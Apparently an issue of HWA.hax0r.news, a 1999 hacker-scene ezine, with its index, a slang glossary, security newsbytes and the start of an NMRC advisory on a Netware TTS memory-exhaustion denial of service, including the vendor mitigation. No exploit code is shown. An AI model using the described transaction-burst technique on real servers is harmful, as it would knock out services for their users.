HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and
www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth.

http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                      <=-[ HWA.hax0r.news ]-=>                          =
==========================================================================
[=HWA'99=] Number 19 Volume 1 1999 May 22nd 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

"If hackers ran the world, there'd be no war--lots of accidents, maybe."
- Anon.

Synopsis
---------

The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news and
anything else I think is worthy of a look see. (Remember I'm doing this for
me, not you; the fact some people happen to get a kick/use out of it is of
secondary importance.)

This list is NOT meant as a replacement for, nor to compete with, the likes
of publications such as CuD or PHRACK or with news sites such as AntiOnline,
the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN, nor
could any other 'digest' of this type do so.

It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many sources
as possible and providing links to further info. It's a labour of love and
will be continued for as long as I feel like it; I'm not motivated by dollars
or the illusion of fame. Did you ever notice how the most famous/infamous
hackers are the ones that get caught? There's a lot to be said for remaining
just outside the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #19
=-----------------------------------------------------------------------=

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
***                                                             ***
*** please join to discuss or impart news on techno/phac scene  ***
*** stuff or just to hang out ... someone is usually around 24/7***
***                                                             ***
*** Note that the channel isn't there to entertain you its for  ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack                                ***
***                                                             ***
*******************************************************************

=-------------------------------------------------------------------------=
Issue #19
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key     Content
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................

01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. NMRC Advisory, DoS with Netware 4.x's TTS........................
04.0 .. CA's InoculateIT for Windows NT v4.53 only scans inboxes.........
04.1 .. CA's Inoculan software vulnerabilities on NT Workstation SP3 or SP4
05.0 .. [ISN] Everywhere your MAC address shows up.......................
06.0 .. [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs..............
07.0 .. INNdstart 2.0 vulnerability, possible root compromise............
08.0 .. Sunsolve Database leaks crucial information......................
09.0 .. [ISN] Asia is wide open to virus, hacker attacks.................
10.0 .. More on Zyklon's legal troubles..................................
11.0 .. IRC war and a Police HQ bomb threat send two headed for trouble..
12.0 .. UK Labels Windows as 'secure'....................................
13.0 .. Yugoslavia to stay plugged in....................................
14.0 .. VISA Releases Draft Protection Profile ..........................
15.0 .. cgichk v1.35 by su1d sh3ll now scans for 65 vulnerabilities......
15.1 .. cgichk.pl PERL version of the above cgi scanner from Wiltered Fire
16.0 .. Vulnerability in Netscape bookmarks found by George Guninski.....
17.0 .. Lotus Notes in bed with the NSA on encryption keys...............
18.0 .. Packetstorm Security Gets the choke order for .yu sites..........
19.0 .. Common Trojans and the ports they can be found on................
20.0 .. Fts_read vulnerability provides root compromise in FreeBSD find, du
21.0 .. Excel Macro Virus protection patch has a hole....................
22.0 .. Possible root compromise when installing new SSHD................
23.0 .. Apple's AtEase 5.0 security hole.................................
24.0 .. Bug in Microsoft Outlook Express.................................
25.0 .. Trivial buffer overflow DoS on WinAMP 2.x........................
26.0 .. DISA Limits network activity.....................................
27.0 .. Money in the bank is an intangible?..............................
28.0 .. r00tfest is May 21st to 23rd, and promises to be a big success...
29.0 .. heh.pl creates a number of rootshells in /tmp and disguises itself
30.0 .. RedHat6.0 fixes available for some current vulnerabilities........
31.0 .. BisonWare FTP server vulnerabilities can lead to root compromise..
32.0 .. Key Escrow revisited (who are the real criminals here??)..........
33.0 .. AOL Under Siege by Hackers, NOT! .................................
34.0 .. Unknown spammer gets sued.........................................
35.0 .. German police crack down on internet crime........................
36.0 .. After a rather long hiatus BoW resurfaces and releases issue #9...
37.0 .. AntiOnline opens up its knowledge database to the pheds...........
38.0 .. [ISN] RAID99 Hosted by CERIAS Call for papers.....................
39.0 .. Cryptogram May 15th'99............................................
40.0 .. [ISN] Why i'm a security pessimist................................
41.0 .. Bombs Off The Net!................................................
42.0 .. Dark Spyre may end up in jail.....................................
43.0 .. ACTINIC ecommerce package claims to be 'unhackable'...............
44.0 .. MP3's off the net?................................................
45.0 .. Free DNS! finally a network picks up the pieces from ml.org ......
46.0 .. pIRCHCrack cracks password in pirch.ini files.....................
47.0 .. NASA vulnerable to attack.........................................
48.0 .. Vermont's Security Compromised ...................................
49.0 .. NIST May Be Named Info Security Clearing House ...................
50.0 .. 097M.Tristate Macro Virus Contained ..............................
51.0 .. "Hackers" Ruin Online Poll .......................................
52.0 .. DSC v1.01 Released new ezine hits the electronic stands...........
53.0 .. Laser Pointers Illegal? ..........................................
54.0 .. Exploiting NT buffer overruns.....................................
55.0 .. More on biometrics from ZDNET.....................................

=--------------------------------------------------------------------------=

AD.S   .. Post your site ads or etc here, if you can offer something in
          return that's tres cool, if not we'll consider ur ad anyways so
          send it in. Ads for other zines are ok too btw just mention us in
          yours, please remember to include links and an email contact.
          Corporate ads will be considered also and if your company wishes
          to donate to or participate in the upcoming Canc0n99 event send in
          your suggestions and ads now... n.b. date and time may be pushed
          back, join the mailing list for up to date information.
          Current dates: Aug 19th-22nd Niagara Falls...

HA.HA  .. Humour and puzzles
          Hey You!
          =------=
          Send in humour for this section! I need a laugh and it's hard to
          find good stuff... ;)

SITE.1 .. Featured site
H.W    .. Hacked Websites
A.0    .. APPENDICES
A.1    .. PHACVW linx and references

=--------------------------------------------------------------------------=

@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT?
V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE
PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY
FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND)
SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED
THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR
HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS ARE NOT NECESSARY OR
EXPECTED BUT ARE APPRECIATED. The current link is
http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE
IN ANY WAY. IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY. Current
email: cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C)
AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES
ARE THEREFORE (C) WHICH MEANS:

I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND
REDISTRIBUTE/MIRROR.

- EoD

Although this file and all future issues are now copyright, some of the
content holds its own copyright and these are printed and respected. News is
news so I'll print any and all news but will quote sources when the source is
known; if it's good enough for CNN it's good enough for me. And I'm doing it
for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If
you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada /
North America (hell even if you are inside ..) and wish to send printed
matter like newspaper clippings, a subscription to your cool foreign hacking
zine or photos, small non-explosive packages or sensitive information etc etc
well, now you can. (w00t) Please no more inflatable sheep or plastic dog
droppings, or fake vomit thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~  reading this from some interesting places, make my day and get a
         mention in the zine, send in a postcard. I realize that some places
         it is cost prohibitive but if you have the time and money be a cool
         dude / gal and send a poor guy a postcard, preferably one that has
         some scenery from your place of residence for my collection. I
         collect stamps too so you kill two birds with one stone by being
         cool and mailing in a postcard. Return address not necessary, just
         a "hey guys being cool in Bahrain, take it easy" will do ... ;-)
         thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising
  position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes
  with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun or
  social engineering examples or transcripts thereof.

If you still can't think of anything you're probably not that interesting a
person after all so don't worry about it.

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net

@HWA

00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete nor
listed in any degree of importance). Unless otherwise noted, like msgs from
lists or news from other sites, articles and information is compiled and or
sourced by Cruciphux, no copyright claimed.

News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ ...............http://www.l0pht.com/
NewsTrolls .......................http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
                                  http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
                                  http://www.ottawacitizen.com/business/
                                  http://search.yahoo.com.sg/search/news_sg?p=hack
                                  http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
                                  http://www.zdnet.com/zdtv/cybercrime/
                                  http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ ........ Electronic Underground Affiliation
http://ech0.cjb.net ............... ech0 Security
http://axon.jccc.net/hir/ ......... Hackers Information Report
http://net-security.org ........... Net Security
http://www.403-security.org ....... Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you
provide; if no response is received by a week or two it is assumed that you
don't care whether the article/email is to be used in an issue or not and it
may be used at my discretion.

Looking for:

Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) Cut em out and send it to
the drop box.

- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info file)
started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq. I've
been archiving this list on the web since late 1993. It is searchable with
glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they
are, how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list`s charter.

I will allow certain informational posts regarding updates to security
tools, documents, etc. But I will not tolerate any unnecessary or
nonessential "noise" on this list.

Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector address
if the response does not meet the above criteria.

Remember: YOYOW.

You own your own words. This means that you are responsible for the words
that you post on this list and that reproduction of those words without your
permission in any medium outside the distribution of this list may be
challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He is
a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my way
I'd reproduce them ALL here, well almost all .... ;-) - Ed

Subscribe: mail majordomo@repsec.com with "subscribe isn".

@HWA

00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~~~~~

Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............: currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black

Foreign Correspondents/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland

And unofficially yet contributing too much to ignore ;)

Spikeman .........................: World media

Please send in your sites for inclusion here if you haven't already, also if
you want your emails listed send me a note ... - Ed

http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)

*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen'            ***
*******************************************************************

:-p

1. We do NOT work for the government in any shape or form. Unless you count
   paying taxes ... in which case we work for the gov't in a BIG WAY. :-/

2. MOSTLY Unchanged since issue #1, although issues are a digest of recent
   news events it's a good idea to check out issue #1 at least and possibly
   also the Xmas issue for a good feel of what we're all about, otherwise
   enjoy - Ed ...

@HWA

00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? Never mind, if you ever find out I may have to
get those hax0rs from 'Hackers' or the Pretorians after you.

In case you couldn't figure it out hax0r is "new skewl" and although it is
laughed at, shunned, or even pigeon-holed with those 'dumb leet (l33t?)
dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS
anymore. BTW to all you up and comers, I'd highly recommend you get that
book. It's almost like buying a clue.

Anyway..on with the show .. - Editorial staff

@HWA

00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq, it won't
be reprinted unless changed in a big way with the exception of the following
excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are listed
below. Some are very useful, others attempt to deny any possible attempts at
eschewing obfuscation by obscuring their actual definitions.

@HWA     - see EoA ;-)

!=       - Mathematical notation "is not equal to" or "does not equal"
           ASC(247) "wavey equals" sign means "almost equal" to. If written
           as =/= (equals sign with a slash thru it) also means !=, =< is
           Equal to or less than and => is equal to or greater than (etc,
           this aint fucking grade school, cripes, don't believe I just
           typed all that..)

AAM      - Ask a minor (someone under age of adulthood, usually <16, <18 or
           <21)

AOL      - A great deal of people that got ripped off for net access by a
           huge clueless isp with sekurity that you can drive buses through,
           we're not talking Kung-Fu being none too good here, Buy-A-Kloo
           maybe at the least they could try leasing one??

*CC      - 1 - Credit Card (as in phraud)
           2 - .cc is COCOS (Keeling) ISLANDS but they probably accept cc's

CCC      - Chaos Computer Club (Germany)

*CON     - Conference, a place hackers crackers and hax0rs among others go
           to swap ideas, get drunk, swap new mad inphoz, get drunk, swap
           gear, get drunk watch videos and seminars, get drunk, listen to
           speakers, and last but not least, get drunk.

*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular
               hacker speak he's the guy that breaks into systems and is
               often (but by no means always) a "script kiddie" see pheer
           2 . An edible biscuit usually crappy tasting without a nice dip,
               I like jalapeno pepper dip or chives sour cream and onion,
               yum - Ed

Ebonics  - speaking like a rastafarian or hip dude of colour also wigger
           Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
           ebonics, speaking in a dark tongue ... being ereet, see pheer

EoC      - End of Commentary

EoA      - End of Article or more commonly @HWA

EoF      - End of file

EoD      - End of diatribe (AOL'ers: look it up)

FUD      - Coined by Unknown and made famous by HNN - "Fear uncertainty and
           doubt", usually in general media articles not high brow articles
           such as ours or other HNN affiliates ;)

du0d     - a small furry animal that scurries over keyboards causing people
           to type weird crap on irc, hence when someone says something
           stupid or off topic 'du0d wtf are you talkin about' may be used.

*HACKER  - Read Stephen Levy's HACKERS for the true definition, then see
           HAX0R

*HAX0R   - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is
               difficult to define, I think it is best defined as pop
               culture's view on The Hacker ala movies such as well erhm
               "Hackers" and The Net etc... usually used by "real" hackers
               or crackers in a derogatory or slang humorous way, like
               'hax0r me some coffee?' or 'can you hax0r some bread on the
               way to the table please?'
           2 - A tool for cutting sheet metal.

HHN      - Maybe a bit confusing with HNN but we did spring to life around
           the same time too, HWA Hax0r News.... HHN is a part of HNN .. and
           HNN as a proper noun means the hackernews site proper. k? k. ;&

HNN      - Hacker News Network and its affiliates
           http://www.hackernews.com/affiliates.html

J00      - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI  - Missing on/from IRC

NFC      - Depends on context: No Further Comment or No Fucking Comment

NFR      - Network Flight Recorder (Do a websearch) see 0wn3d

NFW      - No fuckin'way

*0WN3D   - You are cracked and owned by an elite entity see pheer

*OFCS    - Oh for christ's sakes

PHACV    - And variations of same Phreaking, Hacking, Anarchy, Cracking,
           Carding (CC) Groups Virus, Warfare

           Alternates:
           H  - hacking, hacktivist
           C  - Cracking
           C  - Cracking
           V  - Virus
           W  - Warfare
           A  - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
           P  - Phreaking, "telephone hacking" PHone fREAKs ...
           CT - Cyber Terrorism

*PHEER   - This is what you do when an ereet or elite person is in your
           presence see 0wn3d

*RTFM    - Read the fucking manual - not always applicable since some
           manuals are pure shit but if the answer you seek is indeed in the
           manual then you should have RTFM you dumb ass.

TBC      - To Be Continued also 2bc (usually followed by ellipses...) :^0

TBA      - To Be Arranged/To Be Announced also 2ba

TFS      - Tough fucking shit.

*w00t    - 1 - Reserved for the uber ereet, noone can say this without
               severe repercussions from the underground masses. also
               "w00ten"
           2 - Cruciphux and sAs72's second favourite word (they're both
               shit stirrers)

*wtf     - what the fuck

*ZEN     - The state you reach when you *think* you know everything (but
           really don't) usually shortly after reaching the ZEN like state
           something will break that you just 'fixed' or tweaked.

@HWA

-=- :. .: -=-

01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks to all in the community for their support and interest but I'd like
to see more reader input, help me out here, what's good, what sucks etc, not
that I guarantee I'll take any notice mind you, but send in your thoughts
anyway.
* all the people who sent in cool emails and support

FProphet
Pyra
TwstdPair
_NeM_
D----Y
Kevin Mitnick (watch yer back)
Dicentra
vexxation
sAs72
Spikeman
Astral
p0lix
Vexx
g0at security

Shouts to tekz from HK for asking nicely in eye-are-see! ;-) and to t4ck for
making my night albeit I couldn't stick around for the rest of the comedy
routine. Hacked star dot star with phf huh? .... ;-))

and the #innerpulse, crew and some inhabitants of #leetchans .... although I
use the term 'leet loosely these days, ;)

kewl sites:

+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/

@HWA

01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"What is popular isn't always right, and what is right isn't always
popular..."
- FProphet '99

+++ When was the last time you backed up your important data?

++ FREE KEVIN Demonstrations Go WorldWide

From HNN http://www.hackernews.com/

contributed by Macki

With demonstrations now scheduled in front of the US Embassy in Russia the
FREE KEVIN movement goes World Wide. Kevin Mitnick has been held in pretrial
detention since February 15, 1995, without a constitutionally guaranteed
bail hearing for possession of software allegedly worth millions of dollars.
Protest demonstrations are now being planned around the world for Friday,
June 4 in front of federal courthouses and U.S. embassies beginning at 2 pm
to protest the unjust treatment of Kevin Mitnick. If there is a protest in
your city please attend. If there is not please organize one. The government
must be shown that the people will not sit idly by while their rights are
trampled!

FREE KEVIN Demonstrations
http://www.2600.com/demo/index.html

++ OpenBSD 2.5

From HNN http://www.hackernews.com/

contributed by Weld Pond

OpenBSD, a Free UNIX variant that places emphasis on portability,
standardization, correctness, security, and cryptography, has just been
upgraded to version 2.5. OpenBSD is a multiplatform and ultrasecure
operating system. HNN uses it, shouldn't you?

"OpenBSD: Sending the Kiddies to /dev/null since 1992"

openbsd.org
http://www.openbsd.org/

Amazon.com- Reserve Your Copy Today!
http://www.amazon.com/exec/obidos/ASIN/0968363733/hackernewsnet

++ Chinese attacks on U.S computers

From http://www.net-security.org/

CHINESE HACKERS RAID U.S. COMPUTERS
by LucasAr, Monday 17th May 1999 on 4:30 pm CET

Chinese hackers have attacked U.S. government information systems, including
the White House network, in response to the errant bombing of the Chinese
Embassy in Yugoslavia, according to an FBI report.

++ Just found this on the net, on Discovery Online no less, it has a (short)
Hacker's Hall of Fame list with mini-bios of the featured hackers. - Ed

http://www.discovery.com/area/technology/hackers/stallman.html

++ MIT Pulls R2-D2 Hack

From HNN http://www.hackernews.com/

contributed by Code Kid

Arguably the place where the word Hacker was coined, MIT students have turned
the Great Dome into a giant R2-D2. For those of you who have been dead for
the last seven years R2-D2 is an android from the Star Wars movie series. The
hack consisted of covering the dome in red, white, blue, and black
mesh-fabric panels. The hackers left a dozen doughnuts and instructions on
how to remove the display. The Great Dome has been a popular place for Hacks
in the past. Some of the better known ones have transformed the Dome into a
Breast, a Pumpkin, or have placed a Police Cruiser replica on the top.

MIT Hack Gallery - Pictures Here
http://hacks.mit.edu/Hacks/Gallery.html

Wired
http://www.wired.com/news/news/culture/story/19743.html

++ Scanner profiteer busted

From HNN http://www.hackernews.com/

Scanner Profiteer

contributed by erewhon

Eric Ford, 27, of Studio City, CA, has pleaded guilty to recording and then
selling the contents of a cellular phone call he listened to with a modified
police scanner. The conversation was a "marital squabble" that took place
between Tom Cruise and Nicole Kidman. After parts of the conversation
appeared in tabloids the couple contacted the FBI to start an investigation.
The perpetrator was sentenced by a federal judge to six months in jail, 150
hours of community service and fined $3,000.

APB Online
http://www.apbonline.com/911/1999/05/17/cruise0517_01.html

++ Internet Set Free in Canada

From HNN http://www.hackernews.com/

contributed by blsonne

The Canadian Radio-television and Telecommunications Commission (CRTC)
agreed on Monday that it will not regulate new media services on the
Internet. After concluding that new media services are vibrant, highly
competitive and successful without regulation, the CRTC has decided not to
impose new rules on the internet so as to not hinder Canada in the global
marketplace.

CRTC
http://www.crtc.gc.ca/ENG/NEWS/RELEASES/1999/R990517e.htm

++ Fujitsu Victim of Password Stealing Virus

From HNN http://www.hackernews.com/

contributed by 0yK0t

InfoWeb, Fujitsu Ltd.'s Internet service, has become the victim of an email
virus designed to steal users' passwords. The email claims that users are at
risk from a new virus and should run the enclosed attachment as a
precaution. The attachment then steals users' passwords and emails them to a
separate address. G-Search Ltd., a Fujitsu affiliate, says that at least 68
people received the virus/attachment. And once again this virus only affects
Windows users.
AsiaBizTech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/70448

Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

No mail for sharing this week!

================================================================

@HWA

02.0 From the editor.
~~~~~~~~~~~~~~~~

#include <stdio.h>   /* printf() */

int main(void)
{
    printf ("Read commented source!\n\n");
    /*
     * Issue #19 'w00t'
     *
     *
     *
     *
     *
     *
     */
    printf ("EoF.\n");
    return 0;
}

Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net
complaints and all nastygrams and mailbombs can go to /dev/nul
nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org

danke.

C*:.

@HWA

03.0 Novell Netware buffer overflow in TTS (Transaction Tracking System)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 12 May 1999 14:18:59 -0500
From: Simple Nomad
To: BUGTRAQ@netspace.org
Subject: DoS with Netware 4.x's TTS

_______________________________________________________________________________

Nomad Mobile Research Centre  A D V I S O R Y  www.nmrc.org
Simple Nomad [thegnome@nmrc.org]
12May1998
_______________________________________________________________________________

Platform    : Netware 4.x
Application : NDS
Severity    : High

Synopsis
--------

It is possible to overflow the Transaction Tracking System (TTS) built into Novell Netware and possibly crash multiple servers.

Tested configuration
--------------------

The testing was done with the following configuration:

Netware 4.11, Service Pack 5B

Also confirmed on Netware 4.1. All systems had 64MB RAM and 1 GB drive space.

Bug(s) report
-------------

The Transaction Tracking System (TTS) is used by Novell Netware to help preserve the integrity of data during a system crash.
If a transaction is in the process of being written to the hard drive when the system crashes, upon reboot the partial transaction is backed out, preserving the integrity of the original data. Administrators can optionally flag a file with the TTS flag to add this protection (typically done with databases, especially those that have no rollback features).

TTS by default tracks 10,000 transactions, and each instance uses a small amount of memory. If a burst of transactions is sent to the server and the available memory is exhausted, TTS will disable. While TTS is disabled, no updates can be made to Netware Directory Services. This can impact any program or process that updates NDS, such as login. In extreme overrun cases, such as very large simultaneous (or near simultaneous, actually) transactions, memory will be depleted quickly enough to crash the server. This is not entirely uncommon, as any large burst of traffic updating NDS will cause the problem, such as bringing up a server after several days of downtime that has a Directory Services replica on it. Normally this can be corrected by increasing RAM or lowering the amount of transactions tracked from the maximum default of 10,000 down to say 5,000 by issuing the command SET MAXIMUM TRANSACTIONS = 5000 at the console or via ServMan, and enabling TTS by typing ENABLE TTS at the console.

